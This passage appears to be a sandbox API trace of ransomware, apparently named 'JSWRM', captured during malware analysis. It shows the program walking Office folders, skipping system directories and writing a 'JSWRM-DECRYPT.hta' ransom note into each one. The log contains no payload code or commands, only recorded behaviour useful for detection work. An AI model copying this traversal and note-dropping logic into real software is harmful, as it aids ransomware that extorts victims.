lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPCORE.DLL", lpUsedDefaultChar=0x0) returned 10 [0139.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPCORE.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0139.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPCORE.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPCORE.DLL", lpUsedDefaultChar=0x0) returned 10 [0139.568] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc6246d3c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc6246d3c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdb141e15, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13a640, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PPRESOURCES.DLL", cAlternateFileName="PPRESO~1.DLL")) returned 1 [0139.568] lstrcmpiW (lpString1="PPRESOURCES.DLL", lpString2=".") returned 1 [0139.568] lstrcmpiW (lpString1="PPRESOURCES.DLL", lpString2="..") returned 1 [0139.568] lstrcmpiW (lpString1="PPRESOURCES.DLL", lpString2="...") returned 1 [0139.568] lstrcmpiW (lpString1="PPRESOURCES.DLL", lpString2="windows") returned -1 [0139.568] lstrcmpiW (lpString1="PPRESOURCES.DLL", lpString2="recovery") returned -1 [0139.568] lstrcmpiW (lpString1="PPRESOURCES.DLL", lpString2="perflogs") returned 1 [0139.568] lstrcmpiW (lpString1="PPRESOURCES.DLL", lpString2="documents and settings") returned 1 [0139.568] lstrcmpiW (lpString1="PPRESOURCES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.568] lstrcmpiW (lpString1="PPRESOURCES.DLL", lpString2="system volume information") returned -1 [0139.568] lstrcmpiW (lpString1="PPRESOURCES.DLL", lpString2="msocache") returned 1 [0139.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPRESOURCES.DLL", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0139.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPRESOURCES.DLL", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPRESOURCES.DLL", lpUsedDefaultChar=0x0) returned 15 [0139.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPRESOURCES.DLL", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0139.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPRESOURCES.DLL", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPRESOURCES.DLL", lpUsedDefaultChar=0x0) returned 15 [0139.568] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d278, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PPSLAX.DLL", cAlternateFileName="")) returned 1 [0139.568] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2=".") returned 1 [0139.568] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2="..") returned 1 [0139.568] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2="...") returned 1 [0139.568] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2="windows") returned -1 [0139.568] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2="recovery") returned -1 [0139.568] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2="perflogs") returned 1 [0139.568] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2="documents and settings") returned 1 [0139.568] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.568] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2="system volume information") returned -1 [0139.568] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2="msocache") returned 1 [0139.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPSLAX.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0139.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPSLAX.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPSLAX.DLL", lpUsedDefaultChar=0x0) returned 10 [0139.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPSLAX.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0139.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPSLAX.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPSLAX.DLL", lpUsedDefaultChar=0x0) returned 10 [0139.569] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x21057dcc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21673e23, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x359640, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PPTICO.EXE", cAlternateFileName="")) returned 1 [0139.569] lstrcmpiW (lpString1="PPTICO.EXE", lpString2=".") returned 1 [0139.569] lstrcmpiW (lpString1="PPTICO.EXE", lpString2="..") returned 1 [0139.569] lstrcmpiW (lpString1="PPTICO.EXE", lpString2="...") returned 1 [0139.569] lstrcmpiW (lpString1="PPTICO.EXE", lpString2="windows") returned -1 [0139.569] lstrcmpiW (lpString1="PPTICO.EXE", lpString2="recovery") returned -1 [0139.569] lstrcmpiW (lpString1="PPTICO.EXE", lpString2="perflogs") returned 1 [0139.569] lstrcmpiW (lpString1="PPTICO.EXE", lpString2="documents and settings") returned 1 [0139.569] lstrcmpiW (lpString1="PPTICO.EXE", lpString2="$RECYCLE.BIN") returned 1 [0139.569] lstrcmpiW (lpString1="PPTICO.EXE", lpString2="system volume information") returned -1 [0139.569] lstrcmpiW (lpString1="PPTICO.EXE", lpString2="msocache") returned 1 [0139.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPTICO.EXE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0139.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPTICO.EXE", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPTICO.EXE", lpUsedDefaultChar=0x0) returned 10 [0139.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPTICO.EXE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0139.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPTICO.EXE", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPTICO.EXE", lpUsedDefaultChar=0x0) returned 10 [0139.569] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ccc9d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x18ccc9d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x18f2ea7, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x32ed0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PROJIMPT.EXE", cAlternateFileName="")) returned 1 [0139.569] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2=".") returned 1 [0139.569] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="..") returned 1 [0139.569] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="...") returned 1 [0139.569] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="windows") returned -1 [0139.569] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="recovery") returned -1 [0139.569] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="perflogs") returned 1 [0139.569] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="documents and settings") returned 1 [0139.569] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="$RECYCLE.BIN") returned 1 [0139.569] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="system volume information") returned -1 [0139.569] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="msocache") returned 1 [0139.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROJIMPT.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROJIMPT.EXE", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROJIMPT.EXE", lpUsedDefaultChar=0x0) returned 12 [0139.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROJIMPT.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROJIMPT.EXE", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROJIMPT.EXE", lpUsedDefaultChar=0x0) returned 12 [0139.570] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x436ad46, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x274a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PROJMODL.DLL", cAlternateFileName="")) returned 1 [0139.570] lstrcmpiW (lpString1="PROJMODL.DLL", lpString2=".") returned 1 [0139.570] lstrcmpiW (lpString1="PROJMODL.DLL", lpString2="..") returned 1 [0139.570] lstrcmpiW (lpString1="PROJMODL.DLL", lpString2="...") returned 1 [0139.570] lstrcmpiW (lpString1="PROJMODL.DLL", lpString2="windows") returned -1 [0139.570] lstrcmpiW (lpString1="PROJMODL.DLL", lpString2="recovery") returned -1 [0139.570] lstrcmpiW (lpString1="PROJMODL.DLL", lpString2="perflogs") returned 1 [0139.570] lstrcmpiW (lpString1="PROJMODL.DLL", lpString2="documents and settings") returned 1 [0139.570] lstrcmpiW (lpString1="PROJMODL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.570] lstrcmpiW (lpString1="PROJMODL.DLL", lpString2="system volume information") returned -1 [0139.570] lstrcmpiW (lpString1="PROJMODL.DLL", lpString2="msocache") returned 1 [0139.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROJMODL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROJMODL.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROJMODL.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROJMODL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROJMODL.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROJMODL.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.570] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc39bed4a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb0d2731, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb0d2731, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PROOF", cAlternateFileName="")) returned 1 [0139.570] lstrcmpiW (lpString1="PROOF", lpString2=".") returned 1 [0139.570] lstrcmpiW (lpString1="PROOF", lpString2="..") returned 1 [0139.570] lstrcmpiW (lpString1="PROOF", lpString2="...") returned 1 [0139.570] lstrcmpiW (lpString1="PROOF", lpString2="windows") returned -1 [0139.570] lstrcmpiW (lpString1="PROOF", lpString2="recovery") returned -1 [0139.570] lstrcmpiW (lpString1="PROOF", lpString2="perflogs") returned 1 [0139.570] lstrcmpiW (lpString1="PROOF", lpString2="documents and settings") returned 1 [0139.570] lstrcmpiW (lpString1="PROOF", lpString2="$RECYCLE.BIN") returned 1 [0139.570] lstrcmpiW (lpString1="PROOF", lpString2="system volume information") returned -1 [0139.570] lstrcmpiW (lpString1="PROOF", lpString2="msocache") returned 1 [0139.570] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\jswrm-decrypt.hta")) returned 0xffffffff [0139.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0139.575] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.575] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0139.576] CloseHandle (hObject=0x45c) returned 1 [0139.577] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\jswrm-decrypt.hta")) returned 0x20 [0139.577] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc39bed4a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb0d2731, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x49da092e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232240 [0139.577] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0139.578] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc39bed4a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb0d2731, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x49da092e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.578] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0139.578] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0139.578] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc52c782a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc52c782a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc52c782a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0139.578] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0139.578] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0139.578] lstrcmpiW (lpString1="1033", lpString2="...") returned 1 [0139.578] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0139.578] lstrcmpiW (lpString1="1033", lpString2="recovery") returned -1 [0139.578] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0139.578] lstrcmpiW (lpString1="1033", lpString2="documents and settings") returned -1 [0139.578] lstrcmpiW (lpString1="1033", lpString2="$RECYCLE.BIN") returned 1 [0139.578] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0139.578] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0139.578] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\1033\\jswrm-decrypt.hta")) returned 0xffffffff [0139.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\1033\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.580] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.580] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0139.581] CloseHandle (hObject=0x238) returned 1 [0139.581] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\1033\\jswrm-decrypt.hta")) returned 0x20 [0139.581] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1033\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc52c782a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc52c782a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x49dc6a98, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0139.581] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0139.581] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc52c782a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc52c782a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x49dc6a98, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName="..", cAlternateFileName="")) returned 1 [0139.581] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0139.581] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0139.581] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49dc6a98, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x49dc6a98, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x49dc6a98, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0139.581] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0139.581] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0139.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0139.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0139.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0139.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0139.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0139.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0139.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0139.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0139.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0139.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0139.582] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc52c782a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc52c782a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd928f97c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8b050, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName="MSGR8EN.DLL", cAlternateFileName="")) returned 1 [0139.582] lstrcmpiW (lpString1="MSGR8EN.DLL", lpString2=".") returned 1 [0139.582] lstrcmpiW (lpString1="MSGR8EN.DLL", lpString2="..") returned 1 [0139.582] lstrcmpiW (lpString1="MSGR8EN.DLL", lpString2="...") returned 1 [0139.582] lstrcmpiW (lpString1="MSGR8EN.DLL", lpString2="windows") returned -1 [0139.582] lstrcmpiW (lpString1="MSGR8EN.DLL", lpString2="recovery") returned -1 [0139.582] lstrcmpiW (lpString1="MSGR8EN.DLL", lpString2="perflogs") returned -1 [0139.582] lstrcmpiW (lpString1="MSGR8EN.DLL", lpString2="documents and settings") returned 1 [0139.582] lstrcmpiW (lpString1="MSGR8EN.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.582] lstrcmpiW (lpString1="MSGR8EN.DLL", lpString2="system volume information") returned -1 [0139.582] lstrcmpiW (lpString1="MSGR8EN.DLL", lpString2="msocache") returned -1 [0139.582] WideCharToMultiByte (in: CodePage=0xfde9, 